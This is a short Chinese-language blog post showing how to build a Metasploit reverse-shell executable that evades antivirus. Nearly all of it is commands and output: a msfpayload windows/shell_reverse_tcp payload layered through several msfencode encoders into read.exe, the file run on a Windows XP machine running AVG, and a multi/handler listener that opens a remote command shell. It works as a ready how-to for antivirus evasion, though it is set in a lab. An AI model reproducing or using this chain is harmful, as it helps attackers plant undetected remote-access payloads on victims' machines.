metasploit启动远程shell而不被杀毒软件发现

原创

feier7501 2023-04-26 18:31:11 博主文章分类：backtrack ©著作权

©著作权归作者所有：来自51CTO博客作者feier7501的原创作品，请联系作者获取转载授权，否则将追究法律责任

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)

[*] x86/alpha_upper succeeded with size 966 (iteration=1)

[*] x86/alpha_upper succeeded with size 2000 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)

[*] x86/countdown succeeded with size 2163 (iteration=1)

[*] x86/countdown succeeded with size 2181 (iteration=2)

[*] x86/countdown succeeded with size 2199 (iteration=3)

[*] x86/countdown succeeded with size 2217 (iteration=4)

[*] x86/countdown succeeded with size 2235 (iteration=5)


real    1m33.468s
user    0m52.195s
sys     0m39.830s
root@bt:~#

把read.exe上传到XP，然后在cmd运行，杀毒软件没报告威胁：

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>cd ..

C:\Documents and Settings>cd ..

C:\>read.exe

然后输入命令：

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337 
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1181) at 2013-04-28 06:06:36 -0400

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 3052-FA52

 C:\ 的目录

2012-03-24  11:55                 0 AUTOEXEC.BAT
2013-04-28  16:06       131,820,480 avg_free_x86_all_2013.exe
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-04-28  17:08    <DIR>          Program Files
2013-04-29  22:17            73,802 read.exe
2013-04-28  21:37                38 readme.txt
2013-04-28  15:19    <DIR>          ruby
2013-04-28  20:45    <DIR>          WINDOWS
               5 个文件    131,894,320 字节
               4 个目录  5,329,256,448 可用字节

C:\>

这样就打开了一个远程的shell，并且没有“惊动”avg这个杀毒软件。